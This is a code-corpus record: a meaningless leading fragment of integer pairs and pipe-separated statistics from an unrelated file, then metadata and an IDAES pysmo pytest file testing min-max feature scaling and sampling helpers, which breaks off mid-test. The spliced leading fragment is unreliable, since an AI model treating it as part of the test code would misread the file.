[7,207],[142,208],[123,209],[78,210],[62,211],[3,212],[42,213],[63,214],[60,215],[113,216],[210,217],[180,218],[91,219],[77,220],[164,221],[178,222],[39,223],[218,224],[203,225],[12,226],[209,227],[172,228],[156,229],[42,230],[194,231],[40,232],[95,233],[131,234],[39,235],[135,236],[37,237],[61,238],[186,239],[134,240],[41,241],[206,242],[144,243],[15,244],[138,245],[191,246],[82,247],[174,248],[84,249],[28,250],[44,251],[171,252],[168,253],[112,254],[191,255],[132,256],[146,257],[30,258],[163,259],[178,260],[131,261],[80,262],[23,263],[202,264],[160,265],[203,266],[261,267],[254,268],[226,269],[97,270],[132,271],[6,272],[209,273],[18,274],[175,275],[165,276],[72,277],[234,278],[145,279],[233,280],[180,281],[216,282],[176,283],[160,284],[28,285],[21,286],[24,287],[264,288],[129,289],[118,290],[188,291],[209,292],[50,293],[266,294],[115,295],[122,296],[254,297],[171,298],[233,299],[143,300],[238,301],[88,302],[157,303],[98,304],[60,305],[275,306],[99,307],[150,308],[238,309],[155,310],[53,311],[212,312],[9,313],[163,314],[155,315],[285,316],[232,317],[155,318],[285,319],[141,320],[89,321],[246,322],[93,323],[173,324],[125,325],[17,326],[290,327],[94,328],[324,329],[94,330],[179,331],[101,332],[292,333],[229,334],[190,335],[111,336],[149,337],[292,338],[325,339],[26,340],[9,341],[236,342],[105,343],[133,344],[121,345],[143,346],[177,347],[285,348],[174,349],[290,350],[16,351],[302,352],[250,353],[95,354],[339,355],[10,356],[274,357],[156,358],[334,359],[113,360],[108,361],[177,362],[326,363],[229,364],[73,365],[118,366],[113,367],[336,368],[224,369],[174,370],[39,371],[356,372],[189,373],[280,374],[154,375],[359,376],[78,377],[175,378],[261,379],[185,380],[208,381],[211,382],[265,383],[60,384],[271,385],[304,386],[77,387],[171,388],[234,389],[343,390],[47,391],[367,392],[307,393],[25,394],[371,395],[38,396],[281,397],[308,398],[209,399],[9,400],[133,401],[234,402],[37,403],[237,404],[357,405],[62,406],[153,407],[254,408],[17,409],[388,410],[410,411],[401,412],[109,413],[107,414],[362,415],[300,416],[27,417],[106,418],[324,419],[165,420],[26,421],[330,422],[94,423],[172,424],[230,425],[64,426],[10,427],[93,428],[288,429],[253,430],[224,431],[430,432],[394,433],[356,434],[260,435],[121,436],[253,437],[369,438],[195,439],[30,440],[356,441],[381,442],[381,443],[61,444],[336,445],[164,446],[358,447],[115,448],[219,449],[434,450],[80,451],[108,452],[446,453],[188,454],[447,455],[260,456],[39,457],[31,458],[67,459],[218,460],[213,461],[450,462],[451,463],[259,464],[153,465],[103,466],[157,467],[151,468],[187,469],[73,470],[69,471],[60,472],[359,473],[469,474],[324,475],[460,476],[77,477],[167,478],[351,479],[196,480],[14,481],[326,482],[152,483],[455,484],[309,485],[45,486],[2,487],[403,488],[96,489],[433,490],[356,491],[449,492],[302,493],[466,494],[293,495],[428,496],[456,497],[108,498],[481,499],[352,500],[260,501],[322,502],[193,503],[354,504],[257,505],[278,506],[362,507],[311,508],[139,509],[138,510],[299,511],[307,512],[37,513],[175,514],[197,515],[135,516],[12,517],[49,518],[337,519],[86,520],[460,521],[232,522],[99,523],[253,524],[130,525],[514,526],[457,527],[30,528],[216,529],[73,530],[404,531],[284,532],[82,533],[440,534],[492,535],[206,536],[30,537],[21,538],[43,539],[429,540],[395,541],[507,542],[464,543],[52,544],[395,545],[339,546],[65,547],[423,548],[2,549],[190,550],[116,551],[288,552],[262,553],[155,554],[526,555],[279,556],[247,557],[129,558],[66,559],[43,560],[355,561],[415,562],[21,563],[142,564],[523,565],[135,566],[306,567],[154,568],[194,569],[461,570],[439,571],[63,572],[434,573],[29,574],[486,575],[571,576],[470,577],[366,578],[327,579],[40,580],[100,581],[310,582],[251,583],[229,584],[294,585],[108,586],[30,587],[110,588],[199,589],[487,590],[528,591],[249,592],[195,593],[420,594],[392,595],[111,596],[501,597],[127,598],[302,599],[44,600],[16,601],[448,602],[294,603],[521,604],[491,605],[424,606],[347,607],[572,608],[72,609],[532,610],[407,611],[366,612],[495,613],[557,614],[465,615],[361,616],[332,617],[606,618],[365,619],[435,620],[423,621],[207,622],[51,623],[603,624],[251,625],[192,626],[277,627],[223,628],[344,629],[64,630],[288,631],[576,632],[159,633],[387,634],[539,635],[47,636],[96,637],[115,638],[63,639],[268,640],[61,641],[77,642],[397,643],[461,644],[54,645],[605,646],[249,647],[456,648],[208,649],[487,650],[246,651],[546,652],[314,653],[325,654],[602,655],[469,656],[110,657],[412,658],[447,659],[181,660],[504,661],[24,662],[553,663],[176,664],[235,665],[94,666],[226,667],[336,668],[183,669],[191,670],[328,671],[350,672],[470,673],[158,674],[51,675],[208,676],[425,677],[463,678],[291,679],[574,680],[51,681],[303,682],[628,683],[482,684],[114,685],[429,686],[393,687],[188,688],[249,689],[485,690],[23,691],[590,692],[245,693],[310,694],[297,695],[593,696],[585,697],[46,698],[187,699],[388,700],[561,701],[114,702],[620,703],[421,704],[672,705],[161,706],[675,707],[235,708],[544,709],[367,710],[413,711],[152,712],[395,713],[701,714],[242,715],[656,716],[585,717],[687,718],[60,719],[338,720],[21,721],[53,722],[251,723],[46,724],[539,725],[602,726],[552,727],[488,728],[722,729],[455,730],[534,731],[153,732],[732,733],[520,734],[316,735],[279,736],[522,737],[549,738],[603,739],[136,740],[579,741],[279,742],[619,743],[272,744],[145,745],[413,746],[657,747],[676,748],[59,749],[193,750],[47,751],[93,752],[220,753],[608,754],[100,755],[44,756],[376,757],[8,758],[337,759],[200,760],[120,761],[113,762],[488,763],[77,764],[24,765],[226,766],[351,767],[488,768],[100,769],[495,770],[159,771],[617,772],[44,773],[318,774],[166,775],[532,776],[577,777],[22,778],[238,779],[609,780],[513,781],[514,782],[687,783],[271,784],[118,785],[522,786],[643,787],[441,788],[202,789],[575,790],[176,791],[197,792],[503,793],[760,794],[716,795],[585,796],[99,797],[432,798],[781,799],[10,800],[165,801],[781,802],[587,803],[315,804],[694,805],[337,806],[295,807],[711,808],[226,809],[556,810],[783,811],[205,812],[9,813],[294,814],[340,815],[542,816],[332,817],[118,818],[786,819],[525,820],[666,821],[163,822],[31,823],[115,824],[591,825],[295,826],[232,827],[564,828],[246,829],[336,830],[398,831],[562,832],[810,833],[174,834],[22,835],[817,836],[568,837],[806,838],[373,839],[141,840],[296,841],[589,842],[180,843],[733,844],[366,845],[225,846],[356,847],[397,848],[763,849],[193,850],[693,851],[47,852],[647,853],[736,854],[830,855],[854,856],[232,857],[572,858],[427,859],[63,860],[349,861],[520,862],[658,863],[341,864],[511,865],[85,866],[261,867],[268,868],[763,869],[462,870],[55,871],[267,872],[844,873],[116,874],[346,875],[424,876],[14,877],[715,878],[819,879],[288,880],[805,881],[679,882],[745,883],[772,884],[569,885],[408,886],[548,887],[786,888],[64,889],[506,890],[779,891],[782,892],[509,893],[486,894],[326,895],[102,896],[757,897],[45,898],[481,899],[756,900],[335,901],[415,902],[608,903],[523,904],[787,905],[777,906],[268,907],[860,908],[512,909],[42,910],[261,911],[428,912],[62,913],[126,914],[849,915],[227,916],[12,917],[357,918],[755,919],[324,920],[86,921],[244,922],[493,923],[224,924],[622,925],[732,926],[873,927],[697,928],[31,929],[583,930],[414,931],[756,932],[82,933],[638,934],[172,935],[435,936],[806,937],[179,938],[648,939],[205,940],[864,941],[761,942],[253,943],[611,944],[500,945],[454,946],[644,947],[406,948],[757,949],[381,950],[832,951],[503,952],[681,953],[667,954],[337,955],[374,956],[360,957],[803,958],[120,959],[546,960],[265,961],[614,962],[885,963],[749,964],[733,965],[691,966],[640,967],[118,968],[425,969],[408,970],[855,971],[737,972],[565,973],[512,974],[673,975],[251,976],[232,977],[526,978],[586,979],[174,980],[379,981],[74,982],[256,983],[494,984],[806,985],[887,986],[892,987],[748,988],[257,989],[721,990],[281,991],[309,992],[652,993],[591,994],[569,995],[187,996],[989,997],[959,998],[63,999],[703,1000],[436,1001],[591,1002],[400,1003],[810,1004],[797,1005],[981,1006],[33,1007],[999,1008],[358,1009]]
),
]
| 566.696498
| 57,780
| 0.621336
| 25,450
| 145,641
| 3.555678
| 0.196542
| 0.000111
| 0.000099
| 0.000133
| 0.834969
| 0.834969
| 0.834969
| 0.834969
| 0.834969
| 0.834969
| 0
| 0.639907
| 0.029065
| 145,641
| 256
| 57,781
| 568.910156
| 0.000028
| 0
| 0
| 0.035156
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d64c01894842051f947d4419da10575434334b7a
| 77,654
|
py
|
Python
|
idaes/surrogate/pysmo/tests/test_sampling_modified.py
|
eslickj/idaes-pse
|
328ed07ffb0b4d98c03e972675ea32c41dd2531a
|
[
"RSA-MD"
] | 112
|
2019-02-11T23:16:36.000Z
|
2022-03-23T20:59:57.000Z
|
idaes/surrogate/pysmo/tests/test_sampling_modified.py
|
eslickj/idaes-pse
|
328ed07ffb0b4d98c03e972675ea32c41dd2531a
|
[
"RSA-MD"
] | 621
|
2019-03-01T14:44:12.000Z
|
2022-03-31T19:49:25.000Z
|
idaes/surrogate/pysmo/tests/test_sampling_modified.py
|
eslickj/idaes-pse
|
328ed07ffb0b4d98c03e972675ea32c41dd2531a
|
[
"RSA-MD"
] | 154
|
2019-02-01T23:46:33.000Z
|
2022-03-23T15:07:10.000Z
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
import sys
from idaes.surrogate.pysmo.sampling import LatinHypercubeSampling, UniformSampling, HaltonSampling, HammersleySampling, CVTSampling, SamplingMethods, FeatureScaling
import numpy as np
import pandas as pd
import pyomo.common.unittest as unittest
import pytest
class FeatureScalingTestCases(unittest.TestCase):
"""
test_data_scaling_minmax_01: Test behaviour when input is a numpy array and with 1D array.
test_data_scaling_minmax_02: Test behaviour when input is a numpy array and with 2D array.
test_data_scaling_minmax_03: Test behaviour when input is a numpy array and with 3D array.
test_data_scaling_minmax_04: Test behaviour when input is a numpy array and with 3D array with a varibale is constant.
test_data_scaling_minmax_05: Test behaviour list input TypeError
test_data_scaling_minmax_06: Test behaviour when input is a Pandas DataFrame and with 1D array.
test_data_scaling_minmax_07: Test behaviour when input is a Pandas DataFrame and with 2D array.
test_data_scaling_minmax_08: Test behaviour when input is a Pandas DataFrame and with 3D array.
test_data_scaling_minmax_09: Test behaviour when input is a Pandas DataFrame and with 3D array with a varibale is constant.
test_data_unscaling_minmax_01: Test behaviour when input is a numpy array and with 1D array.
test_data_unscaling_minmax_02: Test behaviour when input is a numpy array and with 2D array.
test_data_unscaling_minmax_03: Test behaviour when input is a numpy array and with 3D array.
test_data_unscaling_minmax_04: Test behaviour when input is a numpy array and with 3D array with a varibale is constant.
test_data_unscaling_minmax_05: Test behaviour IndexError when input array size > array size
test_data_unscaling_minmax_06: Test behaviour IndexError when input array size < array size
"""
def setUp(self):
input_array_np_1d = np.array([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9]])
input_array_np_2d = np.array([[0, 1], [1, 4], [2, 9], [3, 16], [4, 25], [5, 36], [6, 49], [7, 64], [8, 81], [9, 100]])
input_array_np_3d = np.array([[0,10, 11], [1,11, 15], [2,12, 21], [3,13, 29], [4,14, 39], [5,15, 51], [6,16, 65], [7,17, 81], [8,18, 99], [9,19, 119]])
input_array_np_3d_constant = np.array([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
input_array_pd_1d = pd.DataFrame([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9]])
input_array_pd_2d = pd.DataFrame([[0, 1], [1, 4], [2, 9], [3, 16], [4, 25], [5, 36], [6, 49], [7, 64], [8, 81], [9, 100]])
input_array_pd_3d = pd.DataFrame([[0,10, 11], [1,11, 15], [2,12, 21], [3,13, 29], [4,14, 39], [5,15, 51], [6,16, 65], [7,17, 81], [8,18, 99], [9,19, 119]])
input_array_pd_3d_constant = pd.DataFrame([[0, 10, 11], [1, 10, 14], [2, 10, 19], [3, 10, 26], [4, 10, 35], [5, 10, 46], [6, 10, 59], [7, 10, 74], [8, 10, 91], [9, 10, 110]])
self.test_data_numpy_1d = input_array_np_1d
self.test_data_numpy_2d = input_array_np_2d
self.test_data_numpy_3d = input_array_np_3d
self.test_data_numpy_3d_constant = input_array_np_3d_constant
self.test_data_pandas_1d = input_array_pd_1d
self.test_data_pandas_2d = input_array_pd_2d
self.test_data_pandas_3d = input_array_pd_3d
self.test_data_pandas_3d_constant = input_array_pd_3d_constant
@pytest.mark.unit
def test_data_scaling_minmax_01(self):
# 1D
# Sample data generated from between 0 and 9
input_array = self.test_data_numpy_1d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9]])
expected_output_2 = np.array([[0]])
expected_output_1 = (input_array - expected_output_2) / (expected_output_3 - expected_output_2)
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_scaling_minmax_02(self):
# 2D
# Sample data generated from the expression (x_1 + 1)^2 between 0 and 9
input_array = self.test_data_numpy_2d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9, 100]])
expected_output_2 = np.array([[0, 1]])
expected_output_1 = (input_array - expected_output_2) / (expected_output_3 - expected_output_2)
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_scaling_minmax_03(self):
# 3D
# Sample data generated from the expression (x_1 + 1)^2 + x_2, x1: between 0 and 9, x2: between 10 and 19
input_array = self.test_data_numpy_3d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9, 19, 119]])
expected_output_2 = np.array([[0, 10, 11]])
expected_output_1 = (input_array - expected_output_2) / (expected_output_3 - expected_output_2)
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_scaling_minmax_04(self):
# 3D with constant
# Sample data generated from the expression (x_1 + 1)^2 + 10, x1: between 0 and 9
input_array = self.test_data_numpy_3d_constant
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9, 10, 110]])
expected_output_2 = np.array([[0, 10, 11]])
scale = expected_output_3 - expected_output_2
scale[scale == 0.0] = 1.0
expected_output_1 = (input_array - expected_output_2) / scale
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_scaling_minmax_05(self):
# TypeError with list
input_array = self.test_data_numpy_2d.tolist()
with pytest.raises(TypeError):
FeatureScaling.data_scaling_minmax(input_array)
@pytest.mark.unit
def test_data_scaling_minmax_06(self):
# 1D
# Sample data generated from between 0 and 9
input_array = self.test_data_pandas_1d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9]])
expected_output_2 = np.array([[0]])
expected_output_1 = (input_array - expected_output_2) / (expected_output_3 - expected_output_2)
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_scaling_minmax_07(self):
# 2D
# Sample data generated from the expression (x_1 + 1)^2 between 0 and 9
input_array =self.test_data_pandas_2d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9, 100]])
expected_output_2 = np.array([[0, 1]])
expected_output_1 = (input_array - expected_output_2) / (expected_output_3 - expected_output_2)
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_scaling_minmax_08(self):
# 3D
# Sample data generated from the expression (x_1 + 1)^2 + x_2, x1: between 0 and 9, x2: between 10 and 19
input_array = self.test_data_pandas_3d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9, 19, 119]])
expected_output_2 = np.array([[0, 10, 11]])
expected_output_1 = (input_array - expected_output_2) / (expected_output_3 - expected_output_2)
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_scaling_minmax_09(self):
# 3D with constant
# Sample data generated from the expression (x_1 + 1)^2 + 10, x1: between 0 and 9
input_array = self.test_data_pandas_3d_constant
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
expected_output_3 = np.array([[9, 10, 110]])
expected_output_2 = np.array([[0, 10, 11]])
scale = expected_output_3 - expected_output_2
scale[scale == 0.0] = 1.0
expected_output_1 = (input_array - expected_output_2) / scale
np.testing.assert_array_equal(output_3, expected_output_3)
np.testing.assert_array_equal(output_2, expected_output_2)
np.testing.assert_array_equal(output_1, expected_output_1)
@pytest.mark.unit
def test_data_unscaling_minmax_01(self):
# 1D
# Sample data generated from between 0 and 9
input_array = self.test_data_numpy_1d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
un_output_1 = FeatureScaling.data_unscaling_minmax(output_1, output_2, output_3)
np.testing.assert_array_equal(un_output_1, input_array)
@pytest.mark.unit
def test_data_unscaling_minmax_02(self):
# 2D
# Sample data generated from the expression (x_1 + 1)^2 between 0 and 9
input_array = self.test_data_numpy_2d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
un_output_1 = FeatureScaling.data_unscaling_minmax(output_1, output_2, output_3)
np.testing.assert_array_equal(un_output_1, input_array)
@pytest.mark.unit
def test_data_unscaling_minmax_03(self):
# 3D
# Sample data generated from the expression (x_1 + 1)^2 + x_2, x1: between 0 and 9, x2: between 10 and 19
input_array = self.test_data_numpy_3d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
un_output_1 = FeatureScaling.data_unscaling_minmax(output_1, output_2, output_3)
np.testing.assert_array_equal(un_output_1, input_array)
@pytest.mark.unit
def test_data_unscaling_minmax_04(self):
# 3D with constant
# Sample data generated from the expression (x_1 + 1)^2 + 10, x1: between 0 and 9
input_array = self.test_data_numpy_3d_constant
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
un_output_1 = FeatureScaling.data_unscaling_minmax(output_1, output_2, output_3)
np.testing.assert_array_equal(un_output_1, input_array)
@pytest.mark.unit
def test_data_unscaling_minmax_05(self):
# 2D
# Sample data generated from the expression (x_1 + 1)^2 between 0 and 9
input_array = self.test_data_numpy_2d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
min_array = np.array([[1]])
max_array = np.array([[5]])
with pytest.raises(IndexError):
FeatureScaling.data_unscaling_minmax(output_1, min_array, max_array)
@pytest.mark.unit
def test_data_unscaling_minmax_06(self):
# 2D
# Sample data generated from the expression (x_1 + 1)^2 between 0 and 9
input_array = self.test_data_numpy_2d
output_1, output_2, output_3 = FeatureScaling.data_scaling_minmax(input_array)
min_array = np.array([[1,2,3]])
max_array = np.array([[5,6,7]])
with pytest.raises(IndexError):
FeatureScaling.data_unscaling_minmax(output_1, min_array, max_array)
class SamplingMethodsTestCases(unittest.TestCase):
def setUp(self):
input_array_np_1d = np.array([[0], [1], [2], [3], [4], [5], [6], [7], [8], [9]])
input_array_np_2d = np.array([[0, 1], [1, 4], [2, 9], [3, 16], [4, 25], [5, 36], [6, 49], [7, 64], [8, 81], [9, 100]])
input_array_np_3d = np.array([[0,10, 11], [1,11, 15], [2,12, 21], [3,13, 29], [4,14, 39], [5,15, 51], [6,16, 65], [7,17, 81], [8,18, 99], [9,19, 119]])
self.test_data_numpy_1d = input_array_np_1d
self.test_data_numpy_2d = input_array_np_2d
self.test_data_numpy_3d = input_array_np_3d
"""
test_nearest_neighbour_01: Test behaviour with array N x d = (10,3) data and a=[-0.5,1]
test_nearest_neighbour_02: Test behaviour with array N x d = (10,2) data and a=[-0.5]
test_nearest_neighbour_03: Test behaviour with array N x d = (10,1) data and a=[]
test_nearest_neighbour_04: working even with diffent input size
test_nearest_neighbour_05: Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3)
test_points_selection_01: Test behaviour with array N x d = (10,3) data and a=[[-0.5,10],[10,100]]
test_points_selection_02: Test behaviour with array N x d = (10,2) data and a=[[-0.5],[10]]
test_points_selection_03: Test behaviour with array N x d = (10,1) data and a=[[],[]] <---both return the first element
test_points_selection_04: Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); small
test_points_selection_05: Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); large
test_sample_point_selection_01: selection - Test behaviour with array N x d = (10,3) data and a=[[0,0],[10,19]]
test_sample_point_selection_02: selection - Test behaviour with array N x d = (10,2) data and a=[[0],[7]]
test_sample_point_selection_03: selection - Test behaviour with array N x d = (10,1) data and a=[[],[]] <---both return the first element, so return only 1 []
test_sample_point_selection_04: selection - Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); large
test_sample_point_selection_05: selection - Test behaviour raise ValueError if dimension of point is not matching with array N x d = (10,3); large
test_points_selection_06: creation - Test behaviour with points dimension should be d with array N x d = (10,3)
test_points_selection_07: creation - Test behaviour with points dimension should be d with array N x d = (10,2)
test_points_selection_08: creation - Test behaviour with points dimension should be d with array N x d = (10,1)
test_points_selection_09: creation - raise IndexError if dimension of point is not matching with array N x d = (10,3); small
test_points_selection_10: creation - raise IndexError if dimension of point is not matching with array N x d = (10,3); large
test_points_selection_01: Test behaviour with n = 3
test_points_selection_02: Test behaviour with n = 1
test_points_selection_03: Test behaviour with n = 0
test_points_selection_04: Test behaviour with n = -1
test_points_selection_04: Test behaviour with n = 2.9
test_base_conversion_01: Test behaviour with 5 to base 2
test_base_conversion_02: Test behaviour with 57 to base 47
test_base_conversion_03: Test behaviour with negative base - works, returns always 0
test_base_conversion_04: Test behaviour raise ZeroDivisionError with 0 base
test_base_conversion_05: Test behaviour with 1 base, infinity loop
test_prime_base_to_decimal_01: Test behaviour with 0.01 in base 2 to base 10
test_prime_base_to_decimal_02: Test behaviour with 0.01 in base 20 to base 10
test_prime_base_to_decimal_03: working with base 1
test_prime_base_to_decimal_04: working with base -1
test_data_sequencing: in the notes, (3,2) -> expected [0, 0.5, 0.75], but returns [0. , 0.5 , 0.25]
"""
@pytest.mark.unit
def test_nearest_neighbour_01(self):
input_array = self.test_data_numpy_3d
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [-0.5,1])
np.testing.assert_array_equal(closest_point, input_array[0,:])
@pytest.mark.unit
def test_nearest_neighbour_02(self):
input_array = self.test_data_numpy_2d
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [-0.5])
np.testing.assert_array_equal(closest_point, input_array[0,:])
@pytest.mark.unit
def test_nearest_neighbour_03(self):
input_array = self.test_data_numpy_1d
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [])
np.testing.assert_array_equal(closest_point, input_array[0,:])
@pytest.mark.unit
def test_nearest_neighbour_04(self):
input_array = self.test_data_numpy_3d
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [0.5])
@pytest.mark.unit
def test_nearest_neighbour_05(self):
input_array = self.test_data_numpy_3d
with pytest.raises(ValueError):
closest_point = SamplingMethods.nearest_neighbour(self, input_array, [0.5,0.9,10])
@pytest.mark.unit
def test_points_selection_01(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[-0.5,10],
[10,100]])
SamplingClass = SamplingMethods()
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
np.testing.assert_array_equal(equivalent_points[0], input_array[0,:])
np.testing.assert_array_equal(equivalent_points[1], input_array[-1,:])
@pytest.mark.unit
def test_points_selection_02(self):
input_array = self.test_data_numpy_2d
generated_sample_points = np.array([[-0.5],
[10]])
SamplingClass = SamplingMethods()
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
np.testing.assert_array_equal(equivalent_points[0], input_array[0,:])
np.testing.assert_array_equal(equivalent_points[1], input_array[-1,:])
@pytest.mark.unit
def test_points_selection_03(self):
input_array = self.test_data_numpy_1d
generated_sample_points = np.array([[],
[]])
SamplingClass = SamplingMethods()
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
np.testing.assert_array_equal(equivalent_points[0], input_array[0,:])
np.testing.assert_array_equal(equivalent_points[1], input_array[0,:])
@pytest.mark.unit
def test_points_selection_04(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5],
[10]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
@pytest.mark.unit
def test_points_selection_05(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,0.7,10],
[10,0.9,20]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
equivalent_points = SamplingClass.points_selection(input_array, generated_sample_points)
@pytest.mark.unit
def test_sample_point_selection_01(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0,0],
[10,19]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
np.testing.assert_array_equal(unique_sample_points[0], input_array[0,:])
np.testing.assert_array_equal(unique_sample_points[1], input_array[-1,:])
@pytest.mark.unit
def test_sample_point_selection_02(self):
input_array = self.test_data_numpy_2d
generated_sample_points = np.array([[0],
[7]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
np.testing.assert_array_equal(unique_sample_points[0], input_array[0,:])
np.testing.assert_array_equal(unique_sample_points[1], input_array[-1,:])
@pytest.mark.unit
def test_sample_point_selection_03(self):
input_array = self.test_data_numpy_1d
generated_sample_points = np.array([[],
[]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
np.testing.assert_array_equal(unique_sample_points[0], input_array[0,:])
@pytest.mark.unit
def test_sample_point_selection_04(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5],
[7]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
@pytest.mark.unit
def test_sample_point_selection_05(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,1,10],
[7,19,20]])
SamplingClass = SamplingMethods()
with pytest.raises(ValueError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'selection')
@pytest.mark.unit
def test_sample_point_selection_06(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,11,3],
[7,19,4]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
min_ , max_ = input_array[0, :], input_array[1, :]
testing = min_ + generated_sample_points * (max_ - min_)
np.testing.assert_array_equal(testing,unique_sample_points)
@pytest.mark.unit
def test_sample_point_selection_07(self):
input_array = self.test_data_numpy_2d
generated_sample_points = np.array([[0.5,1],
[7,19]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
min_ , max_ = input_array[0, :], input_array[1, :]
testing = min_ + generated_sample_points * (max_ - min_)
np.testing.assert_array_equal(testing,unique_sample_points)
@pytest.mark.unit
def test_sample_point_selection_08(self):
input_array = self.test_data_numpy_1d
generated_sample_points = np.array([[0.5],
[7]])
SamplingClass = SamplingMethods()
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
min_ , max_ = input_array[0, :], input_array[1, :]
testing = min_ + generated_sample_points * (max_ - min_)
np.testing.assert_array_equal(testing,unique_sample_points)
@pytest.mark.unit
def test_sample_point_selection_09(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[],
[]])
SamplingClass = SamplingMethods()
with pytest.raises(IndexError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
@pytest.mark.unit
def test_sample_point_selection_10(self):
input_array = self.test_data_numpy_3d
generated_sample_points = np.array([[0.5,1,10,11],
[7,19,10,12]])
SamplingClass = SamplingMethods()
with pytest.raises(IndexError):
unique_sample_points = SamplingClass.sample_point_selection(input_array, generated_sample_points,sampling_type = 'creation')
@pytest.mark.unit
def test_prime_number_generator_01(self):
prime_list = SamplingMethods.prime_number_generator(self, 3)
np.testing.assert_array_equal(prime_list, [2, 3, 5])
@pytest.mark.unit
def test_prime_number_generator_02(self):
prime_list = SamplingMethods.prime_number_generator(self, 1)
np.testing.assert_array_equal(prime_list, [2])
@pytest.mark.unit
